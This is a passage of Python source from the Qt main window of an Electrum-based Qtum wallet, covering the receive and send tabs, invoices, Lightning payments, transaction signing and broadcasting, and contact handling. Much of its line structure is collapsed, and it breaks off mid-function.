    def create_channels_tab(self):
        self.channels_list = ChannelsList(self)
        t = self.channels_list.get_toolbar()
        return self.create_list_tab(self.channels_list, t)

    def create_history_tab(self):
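        # The history tab is a Qt model/view pair: HistoryModel holds the data,
        # HistoryList is the view, and set_view() ties the model back to the
        # view.  The list doubles as its own searchable_list so the status-bar
        # search box can filter it, and the toolbar visibility is restored from
        # the 'show_toolbar_history' config key.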
self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) tab = self.create_list_tab(l, toolbar) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return tab def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_channel(self, channel_id): from . import channel_details channel_details.ChannelDetailsDialog(self, channel_id).show() def show_transaction(self, tx, *, tx_desc=None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, parent=self, desc=tx_desc) def show_lightning_transaction(self, tx_item): from .lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx_item) d.show() def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.connect_fields(self, self.amount_e, self.fiat_send_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Qtum addresses.'), _('The qtum address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('New Address')) self.create_invoice_button.setIcon(read_QIcon("qtum.png")) self.create_invoice_button.setToolTip('Create on-chain request') self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() 
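        # Button row for the receive tab: the stretch pushes the buttons to the
        # right, and a separate Lightning request button is appended just below
        # when the wallet has Lightning enabled.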
buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.wallet.has_lightning(): self.create_invoice_button.setText(_('New Address')) self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setToolTip('Create lightning request') self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_payreq_e = ButtonsTextEdit() self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT)) self.receive_payreq_e.addCopyButton(self.app) self.receive_payreq_e.setReadOnly(True) self.receive_payreq_e.textChanged.connect(self.update_receive_qr) self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=220) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.setFont(QFont(MONOSPACE_FONT)) self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code")) self.receive_requests_label = QLabel(_('Incoming payments')) from .request_list import RequestList self.request_list = RequestList(self) receive_tabs = QTabWidget() receive_tabs.addTab(self.receive_address_e, _('Address')) receive_tabs.addTab(self.receive_payreq_e, _('Request')) receive_tabs.addTab(self.receive_qr, _('QR Code')) receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0)) receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i)) receive_tabs_sp = receive_tabs.sizePolicy() receive_tabs_sp.setRetainSizeWhenHidden(True) receive_tabs.setSizePolicy(receive_tabs_sp) def maybe_hide_receive_tabs(): receive_tabs.setVisible(bool(self.receive_payreq_e.text())) self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs) maybe_hide_receive_tabs() # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addWidget(receive_tabs) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_requests(self, keys): for key in keys: self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password 
= None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) if is_lightning: if not self.wallet.lnworker.channels: self.show_error(_("You need to open a Lightning channel first.")) return # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy) key = self.wallet.lnworker.add_request(amount, message, expiry) else: key = self.create_bitcoin_request(amount, message, expiry) if not key: return self.address_list.update() assert key is not None self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') self.receive_message_e.setText('') # copy to clipboard r = self.wallet.get_request(key) content = r.invoice if r.is_lightning() else r.get_address() title = _('Invoice') if is_lightning else _('Address') self.do_copy(content, title=title) def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]: addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): # imported wallet msg = [ _('No more addresses in your wallet.'), ' ', _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ', _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n', _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'), ] if not self.question(''.join(msg)): return addr = self.wallet.get_receiving_address() else: # deterministic wallet if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, content: str, *, title: str = None) -> None: self.app.clipboard().setText(content) if title is None: tooltip_text = _("Text copied to clipboard").format(title) else: tooltip_text = _("{} copied to clipboard").format(title) QToolTip.showText(QCursor.pos(), tooltip_text, self) def clear_receive_tab(self): self.receive_payreq_e.setText('') self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() self.request_list.clearSelection() def toggle_qr_window(self): from . 
import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def update_receive_qr(self): uri = str(self.receive_payreq_e.text()) if maybe_extract_bolt11_invoice(uri): # encode lightning invoices as uppercase so QR encoding can use # alphanumeric mode; resulting in smaller QR codes uri = uri.upper() self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) self.payto_e.addPasteButton(self.app) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Qtum address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Qtum address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = FreezableLineEdit() self.message_e.setMinimumWidth(700) grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" 
to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(100) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.send_button = EnterButton(_("Pay") + "...", self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.save_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 4) self.amount_e.shortcut.connect(self.spend_max) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) self.set_onchain(False) self.invoices_label = QLabel(_('Outgoing payments')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) hbox.addStretch(1) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return outputs = self.payto_e.get_outputs(True) if not outputs: return make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=self.get_coins(), outputs=outputs, fee=fee_est, is_sweep=False) try: try: tx = make_tx(None) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. 
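                # Retrying with an explicit zero fee lets the "Max" amount still
                # be computed and shown; the actual fee is chosen later in the
                # confirmation dialog (see the tooltip built further down).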
tx = make_tx(0) except (MultipleSpendMaxTxOutputs, NotEnoughFunds) as e: self.max_button.setChecked(False) self.show_error(str(e)) return self.max_button.setChecked(True) amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) # show tooltip explaining max amount mining_fee = tx.get_fee() mining_fee_str = self.format_amount_and_units(mining_fee) msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str) if x_fee_amount: twofactor_fee_str = self.format_amount_and_units(x_fee_amount) msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str) frozen_bal = self.get_frozen_balance_str() if frozen_bal: msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal) QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) @protected def protect(self, func, args, password): return func(*args, password) def read_outputs(self) -> List[PartialTxOutput]: if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.scriptpubkey is None: self.show_error(_('Qtum Address is None')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def check_send_tab_payto_line_and_show_errors(self) -> bool: """Returns whether there are errors. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: if len(errors) == 1 and not errors[0].is_multiline: err = errors[0] self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" + f"{err.line_content[:40]}...\n\n" f"{err.exc!r}") else: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... 
({err.exc!r})" for err in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True return False # no errors def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]): if amount_msat is None: raise Exception("missing amount for LN invoice") amount_sat = Decimal(amount_msat) / 1000 # FIXME this is currently lying to user as we truncate to satoshis msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat)) if not self.question(msg): return self.save_pending_invoice() def task(): coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) return fut.result() self.wallet.thread.add(task) def on_request_status(self, wallet, key, status): if wallet != self.wallet: return req = self.wallet.receive_requests.get(key) if req is None: return if status == PR_PAID: self.notify(_('Payment received') + '\n' + key) self.need_update.set() else: self.request_list.update_item(key, req) def on_invoice_status(self, wallet, key): if wallet != self.wallet: return invoice = self.wallet.get_invoice(key) if invoice is None: return status = self.wallet.get_invoice_status(invoice) if status == PR_PAID: self.invoice_list.update() else: self.invoice_list.update_item(key, invoice) def on_payment_succeeded(self, wallet, key): description = self.wallet.get_label(key) self.notify(_('Payment succeeded') + '\n\n' + description) self.need_update.set() def on_payment_failed(self, wallet, key, reason): self.show_error(_('Payment failed') + '\n\n' + reason) def read_invoice(self): if self.check_send_tab_payto_line_and_show_errors(): return if not self._is_onchain: invoice_str = self.payto_e.lightning_invoice if not invoice_str: return if not self.wallet.has_lightning(): self.show_error(_('Lightning is disabled')) return invoice = LNInvoice.from_bech32(invoice_str) if invoice.get_amount_msat() is None: amount_sat = self.amount_e.get_amount() if amount_sat: invoice.amount_msat = int(amount_sat * 1000) else: self.show_error(_('No amount')) return return invoice else: outputs = self.read_outputs() if self.check_send_tab_onchain_outputs_and_show_errors(outputs): return message = self.message_e.text() return self.wallet.create_invoice( outputs=outputs, message=message, pr=self.payment_request, URI=self.payto_URI) def do_save_invoice(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.save_pending_invoice() def save_pending_invoice(self): if not self.pending_invoice: return self.do_clear() self.wallet.save_invoice(self.pending_invoice) self.invoice_list.update() self.pending_invoice = None def do_pay(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.do_pay_invoice(self.pending_invoice) def pay_multiple_invoices(self, invoices): outputs = [] for invoice in invoices: outputs += invoice.outputs self.pay_onchain_dialog(self.get_coins(), outputs) def do_pay_invoice(self, invoice: 'Invoice'): if invoice.type == PR_TYPE_LN: assert isinstance(invoice, LNInvoice) self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat()) elif invoice.type == PR_TYPE_ONCHAIN: 
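            # On-chain invoices carry their outputs directly; they are paid by
            # building a transaction from the wallet's spendable (or manually
            # selected) coins via pay_onchain_dialog() below.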
assert isinstance(invoice, OnchainInvoice) self.pay_onchain_dialog(self.get_coins(), invoice.outputs) else: raise Exception('unknown invoice type') def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]: coins = self.get_manually_selected_coins() if coins is not None: return coins else: return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only) def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]: """Return a list of selected coins or None. Note: None means selection is not being used, while an empty sequence means the user specifically selected that. """ return self.utxo_list.get_spend_list() def get_text_not_enough_funds_mentioning_frozen(self) -> str: text = _("Not enough funds") frozen_str = self.get_frozen_balance_str() if frozen_str: text += " ({} {})".format( frozen_str, _("are frozen") ) return text def get_frozen_balance_str(self) -> Optional[str]: frozen_bal = sum(self.wallet.get_frozen_balance()) if not frozen_bal: return None return self.format_amount_and_units(frozen_bal) def pay_onchain_dialog( self, inputs: Sequence[PartialTxInput], outputs: List[PartialTxOutput], *, external_keypairs=None) -> None: # trustedcoin requires this if run_hook('abort_send', self): return is_sweep = bool(external_keypairs) make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=inputs, outputs=outputs, fee=fee_est, is_sweep=is_sweep) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep) if conf_dlg.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not conf_dlg.have_enough_funds_assuming_zero_fees(): text = self.get_text_not_enough_funds_mentioning_frozen() self.show_message(text) return # shortcut to advanced preview (after "enough funds" check!) if self.config.get('advanced_preview'): preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs) preview_dlg.show() return cancelled, is_send, password, tx = conf_dlg.run() if cancelled: return if is_send: self.save_pending_invoice() def sign_done(success): if success: self.broadcast_or_show(tx) self.sign_tx_with_password(tx, callback=sign_done, password=password, external_keypairs=external_keypairs) else: preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs) preview_dlg.show() def preview_tx_dialog(self, *, make_tx, external_keypairs=None): d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs, window=self) d.show() def broadcast_or_show(self, tx: Transaction, * , broadcast_done=None): if tx is None: self.show_error("tx is None") return if not tx.is_complete(): self.show_transaction(tx) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) self.show_transaction(tx) return self.broadcast_transaction(tx) if broadcast_done: broadcast_done(tx) @protected def sign_tx(self, tx, *, callback, external_keypairs, password): self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs) def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None): '''Sign the transaction in a separate thread. 
When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if external_keypairs: # can sign directly task = partial(tx.sign, external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx: Transaction): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Invoice has expired") try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: return False, e.get_message_for_gui() except BestEffortRequestFailed as e: return False, repr(e) # success txid = tx.txid() if pr: self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return True, txid # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: success, msg = result if success: parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def mktx_for_open_channel(self, funding_sat): coins = self.get_coins(nonlocal_only=True) make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins, funding_sat=funding_sat, fee_est=fee_est) return make_tx def open_channel(self, connect_str, funding_sat, push_amt): try: extract_nodeid(connect_str) except ConnStringFormatError as e: self.main_window.show_error(str(e)) return # use ConfirmTxDialog # we need to know the fee before we broadcast, because the txid is required make_tx = self.mktx_for_open_channel(funding_sat) d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False) # disable preview button because the user must not broadcast tx before establishment_flow d.preview_button.setEnabled(False) cancelled, is_send, password, funding_tx = d.run() if not is_send: return if cancelled: return # read funding_sat from tx; converts '!' 
to int value funding_sat = funding_tx.output_value_for_address(ln_dummy_address()) def task(): return self.wallet.lnworker.open_channel(connect_str=connect_str, funding_tx=funding_tx, funding_sat=funding_sat, push_amt_sat=push_amt, password=password) def on_success(args): chan, funding_tx = args n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) if not funding_tx.is_complete(): message += '\n\n' + _('Please sign and broadcast the funding transaction') self.show_message(message) if not funding_tx.is_complete(): self.show_transaction(funding_tx) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(repr(e))) WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b: bool) -> None: self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoices(self, keys): for key in keys: self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setAmount(pr.get_amount()) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(str(pr.error)) self.payment_request = None self.do_clear() def on_pr(self, request: 'paymentrequest.PaymentRequest'): self.set_onchain(True) self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): """Parse ln invoice, and prepare the send tab for it.""" try: lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) except Exception as e: raise LnDecodeException(e) from e pubkey = lnaddr.pubkey.serialize().hex() for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.get_amount_sat() is not None: self.amount_e.setAmount(lnaddr.get_amount_sat()) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self._is_onchain = b self.max_button.setEnabled(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = 
out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e]: e.setText('') e.setFrozen(False) self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) tab = self.create_list_tab(l, toolbar) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) l.show_toolbar(toolbar_shown) return tab def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = UTXOList(self) return self.create_list_tab(self.utxo_list) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if not self.question(_("Do you want to remove {} from your wallet?").format(addr)): return try: self.wallet.delete_address(addr) except UserFacingException as e: self.show_error(str(e)) else: self.need_update.set() # history, addresses, coins self.clear_receive_tab() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not 